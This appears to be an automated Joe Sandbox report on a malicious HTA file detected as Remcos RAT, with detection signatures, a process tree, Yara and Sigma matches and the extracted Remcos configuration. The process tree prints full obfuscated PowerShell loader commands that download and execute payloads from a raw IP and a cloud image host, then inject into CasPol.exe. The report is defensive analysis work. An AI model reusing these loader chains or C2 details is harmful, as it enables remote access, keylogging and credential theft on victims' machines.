Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
verynicegirlwalkingarounftheworldmuuuah.hta

Overview

General Information

Sample name:verynicegirlwalkingarounftheworldmuuuah.hta
Analysis ID:1590499
MD5:6dc778742c1403851ff2659fcee24150
SHA1:7cc386b4ddf71303ed5a42a3ba8c8c8404ff5660
SHA256:ba54736b563266fd4f32553c63737596d3208a9112cb47d6513f68db2c2e6b67
Tags:htauser-lontze7
Infos:

Detection

Cobalt Strike, Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Cobalt Strike Beacon
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Yara detected obfuscated html page
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 7236 cmdline: mshta.exe "C:\Users\user\Desktop\verynicegirlwalkingarounftheworldmuuuah.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 7348 cmdline: "C:\Windows\system32\cmd.exe" "/C POWerSHeLl -ex bYPasS -NOp -w 1 -c dEVICECREdentiALdEpLOYMENT ; InvokE-EXprEssioN($(Invoke-exPREssiON('[syStem.texT.enCOdiNG]'+[cHAR]0X3A+[CHar]58+'utF8.GEtsTRING([SYsTem.coNVERt]'+[ChAr]0x3A+[CHAr]0x3a+'frOMbAsE64sTrIng('+[CHAR]34+'JGJvWG5VdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1iZXJERUZJbml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT04uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLb29QLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFcVosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0aWdtLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbmdUWWpaeFVNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJmVmYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRWdOYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRib1huVXU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy43Lzc3L3NlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGluZ3MudElGIiwiJEVOVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGkudmJTIiwwLDApO1N0YVJULXNsZUVQKDMpO2luVm9rRS1FWHByRVNTaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2ZvcmdldG1lYmFja3dpdGhnb29kbmV3c3RoaS52YlMi'+[ChaR]34+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7392 cmdline: POWerSHeLl -ex bYPasS -NOp -w 1 -c dEVICECREdentiALdEpLOYMENT ; InvokE-EXprEssioN($(Invoke-exPREssiON('[syStem.texT.enCOdiNG]'+[cHAR]0X3A+[CHar]58+'utF8.GEtsTRING([SYsTem.coNVERt]'+[ChAr]0x3A+[CHAr]0x3a+'frOMbAsE64sTrIng('+[CHAR]34+'JGJvWG5VdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1iZXJERUZJbml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT04uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLb29QLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFcVosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0aWdtLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbmdUWWpaeFVNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJmVmYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRWdOYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRib1huVXU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy43Lzc3L3NlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGluZ3MudElGIiwiJEVOVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGkudmJTIiwwLDApO1N0YVJULXNsZUVQKDMpO2luVm9rRS1FWHByRVNTaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2ZvcmdldG1lYmFja3dpdGhnb29kbmV3c3RoaS52YlMi'+[ChaR]34+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • csc.exe (PID: 7544 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2qf3pwzp\2qf3pwzp.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 7560 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8DF2.tmp" "c:\Users\user\AppData\Local\Temp\2qf3pwzp\CSCB3A240E1501D48929A893BA197F62C4E.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • wscript.exe (PID: 7600 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsforgetmebackwithgoodnewsthi.vbS" MD5: FF00E0480075B095948000BDC66E81F0)
          • powershell.exe (PID: 7652 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.mihrofgnimocsyad#aergh#iwsgnih##sebgnissik/77/7.321.542.271//:p##h';$restoredText = $originalText -replace '#', 't';$wheal = 'https://res.cloudinary.com/dmwnmemcm/image/upload/v1736770712/mq8ht5gredx4ck4rramp.jpg ';$nectars = New-Object System.Net.WebClient;$polyedrons = $nectars.DownloadData($wheal);$tropical = [System.Text.Encoding]::UTF8.GetString($polyedrons);$bubbas = '<<BASE64_START>>';$fairhood = '<<BASE64_END>>';$fulminatory = $tropical.IndexOf($bubbas);$quadriloge = $tropical.IndexOf($fairhood);$fulminatory -ge 0 -and $quadriloge -gt $fulminatory;$fulminatory += $bubbas.Length;$oxytrope = $quadriloge - $fulminatory;$moorcocks = $tropical.Substring($fulminatory, $oxytrope);$pelisse = -join ($moorcocks.ToCharArray() | ForEach-Object { $_ })[-1..-($moorcocks.Length)];$unreigned = [System.Convert]::FromBase64String($pelisse);$chevaux = [System.Reflection.Assembly]::Load($unreigned);$cutesily = [dnlib.IO.Home].GetMethod('VAI');$cutesily.Invoke($null, @($restoredText, 'pulvilliform', 'pulvilliform', 'pulvilliform', 'CasPol', 'pulvilliform', 'pulvilliform','pulvilliform','pulvilliform','pulvilliform','pulvilliform','pulvilliform','1','pulvilliform','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 7660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • CasPol.exe (PID: 8052 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
              • CasPol.exe (PID: 8132 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\aockdegvxmbvbenvzdaftknehua" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
              • CasPol.exe (PID: 8140 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\kihdewrolutadkbziovgwxanibscod" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
              • CasPol.exe (PID: 8160 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\nkmnepbqzclnnyxdazhahcueqhcdhonmrf" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["172.245.123.12:8690:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-ET2B3I", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
SourceRuleDescriptionAuthorStrings
verynicegirlwalkingarounftheworldmuuuah.htaJoeSecurity_ObshtmlYara detected obfuscated html pageJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
      SourceRuleDescriptionAuthorStrings
      0000000C.00000002.4102227044.0000000001355000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0000000C.00000002.4104782435.0000000002EAF000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
              0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                Click to see the 20 entries
                SourceRuleDescriptionAuthorStrings
                12.2.CasPol.exe.400000.0.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  12.2.CasPol.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                    12.2.CasPol.exe.400000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                      12.2.CasPol.exe.400000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                      • 0x6c708:$a1: Remcos restarted by watchdog!
                      • 0x6cc80:$a3: %02i:%02i:%02i:%03i
                      12.2.CasPol.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
                      • 0x66994:$str_a1: C:\Windows\System32\cmd.exe
                      • 0x66910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                      • 0x66910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                      • 0x66e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                      • 0x67410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                      • 0x66a04:$str_b2: Executing file:
                      • 0x6784c:$str_b3: GetDirectListeningPort
                      • 0x67200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                      • 0x67380:$str_b7: \update.vbs
                      • 0x66a2c:$str_b9: Downloaded file:
                      • 0x66a18:$str_b10: Downloading file:
                      • 0x66abc:$str_b12: Failed to upload file:
                      • 0x67814:$str_b13: StartForward
                      • 0x67834:$str_b14: StopForward
                      • 0x672d8:$str_b15: fso.DeleteFile "
                      • 0x6726c:$str_b16: On Error Resume Next
                      • 0x67308:$str_b17: fso.DeleteFolder "
                      • 0x66aac:$str_b18: Uploaded file:
                      • 0x66a6c:$str_b19: Unable to delete:
                      • 0x672a0:$str_b20: while fso.FileExists("
                      • 0x66f49:$str_c0: [Firefox StoredLogins not found]
                      Click to see the 7 entries
                      SourceRuleDescriptionAuthorStrings
                      amsi32_7652.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                        System Summary

                        barindex
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.mihrofgnimocsyad#aergh#iwsgnih##sebgnissik/77/7.321.542.271//:p##h';$restoredText = $originalText -replace '#', 't';$wheal = 'https://res.cloudinary.com/dmwnmemcm/image/upload/v1736770712/mq8ht5gredx4ck4rramp.jpg ';$nectars = New-Object System.Net.WebClient;$polyedrons = $nectars.DownloadData($wheal);$tropical = [System.Text.Encoding]::UTF8.GetString($polyedrons);$bubbas = '<<BASE64_START>>';$fairhood = '<<BASE64_END>>';$fulminatory = $tropical.IndexOf($bubbas);$quadriloge = $tropical.IndexOf($fairhood);$fulminatory -ge 0 -and $quadriloge -gt $fulminatory;$fulminatory += $bubbas.Length;$oxytrope = $quadriloge - $fulminatory;$moorcocks = $tropical.Substring($fulminatory, $oxytrope);$pelisse = -join ($moorcocks.ToCharArray() | ForEach-Object { $_ })[-1..-($moorcocks.Length)];$unreigned = [System.Convert]::FromBase64String($pelisse);$chevaux = [System.Reflection.Assembly]::Load($unreigned);$cutesily = [dnlib.IO.Home].GetMethod('VAI');$cutesily.Invoke($null, @($restoredText, 'pulvilliform', 'pulvilliform', 'pulvilliform', 'CasPol', 'pulvilliform', 'pulvilliform','pulvilliform','pulvilliform','pulvilliform','pulvilliform','pulvilliform','1','pulvilliform','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.mihrofgnimocsyad#aergh#iwsgnih##sebgnissik/77/7.321.542.271//:p##h';$restoredText = $originalText -replace '#', 't';$wheal = 'https://res.cloudinary.com/dmwnmemcm/image/upload/v1736770712/mq8ht5gredx4ck4rramp.jpg ';$nectars = New-Object System.Net.WebClient;$polyedrons = $nectars.DownloadData($wheal);$tropical = [System.Text.Encoding]::UTF8.GetString($polyedrons);$bubbas = '<<BASE64_START>>';$fairhood = '<<BASE64_END>>';$fulminatory = $tropical.IndexOf($bubbas);$quadriloge = $tropical.IndexOf($fairhood);$fulminatory -ge 0 -and $quadriloge -gt $fulminatory;$fulminatory += $bubbas.Length;$oxytrope = $quadrilog
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsforgetmebackwithgoodnewsthi.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsforgetmebackwithgoodnewsthi.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: POWerSHeLl -ex bYPasS -NOp -w 1 -c dEVICECREdentiALdEpLOYMENT ; InvokE-EXprEssioN($(Invoke-exPREssiON('[syStem.texT.enCOdiNG]'+[cHAR]0X3A+[CHar]58+'utF8.GEtsTRING([SYsTem.coNVERt]'+[ChAr]0x3A+[CHAr]0x3a+'frOMbAsE64sTrIng('+[CHAR]34+'JGJvWG5VdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1iZXJERUZJbml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT04uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLb29QLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFcVosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0aWdtLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbmdUWWpaeFVNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJmVmYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRWdOYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRib1huVXU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy43Lzc3L3NlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGluZ3MudElGIiwiJEVOVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGkudmJTIiwwLDApO1N0YVJULXNsZUVQKDMpO2luVm9rRS1FWHByRVNTaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2ZvcmdldG1lYmFja3dpdGhnb29kbmV3c3RoaS52YlMi'+[ChaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7392, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsforgetmebackwithgoodnewsthi.vbS" , ProcessId: 7600, ProcessName: wscript.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.mihrofgnimocsyad#aergh#iwsgnih##sebgnissik/77/7.321.542.271//:p##h';$restoredText = $originalText -replace '#', 't';$wheal = 'https://res.cloudinary.com/dmwnmemcm/image/upload/v1736770712/mq8ht5gredx4ck4rramp.jpg ';$nectars = New-Object System.Net.WebClient;$polyedrons = $nectars.DownloadData($wheal);$tropical = [System.Text.Encoding]::UTF8.GetString($polyedrons);$bubbas = '<<BASE64_START>>';$fairhood = '<<BASE64_END>>';$fulminatory = $tropical.IndexOf($bubbas);$quadriloge = $tropical.IndexOf($fairhood);$fulminatory -ge 0 -and $quadriloge -gt $fulminatory;$fulminatory += $bubbas.Length;$oxytrope = $quadriloge - $fulminatory;$moorcocks = $tropical.Substring($fulminatory, $oxytrope);$pelisse = -join ($moorcocks.ToCharArray() | ForEach-Object { $_ })[-1..-($moorcocks.Length)];$unreigned = [System.Convert]::FromBase64String($pelisse);$chevaux = [System.Reflection.Assembly]::Load($unreigned);$cutesily = [dnlib.IO.Home].GetMethod('VAI');$cutesily.Invoke($null, @($restoredText, 'pulvilliform', 'pulvilliform', 'pulvilliform', 'CasPol', 'pulvilliform', 'pulvilliform','pulvilliform','pulvilliform','pulvilliform','pulvilliform','pulvilliform','1','pulvilliform','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.mihrofgnimocsyad#aergh#iwsgnih##sebgnissik/77/7.321.542.271//:p##h';$restoredText = $originalText -replace '#', 't';$wheal = 'https://res.cloudinary.com/dmwnmemcm/image/upload/v1736770712/mq8ht5gredx4ck4rramp.jpg ';$nectars = New-Object System.Net.WebClient;$polyedrons = $nectars.DownloadData($wheal);$tropical = [System.Text.Encoding]::UTF8.GetString($polyedrons);$bubbas = '<<BASE64_START>>';$fairhood = '<<BASE64_END>>';$fulminatory = $tropical.IndexOf($bubbas);$quadriloge = $tropical.IndexOf($fairhood);$fulminatory -ge 0 -and $quadriloge -gt $fulminatory;$fulminatory += $bubbas.Length;$oxytrope = $quadrilog
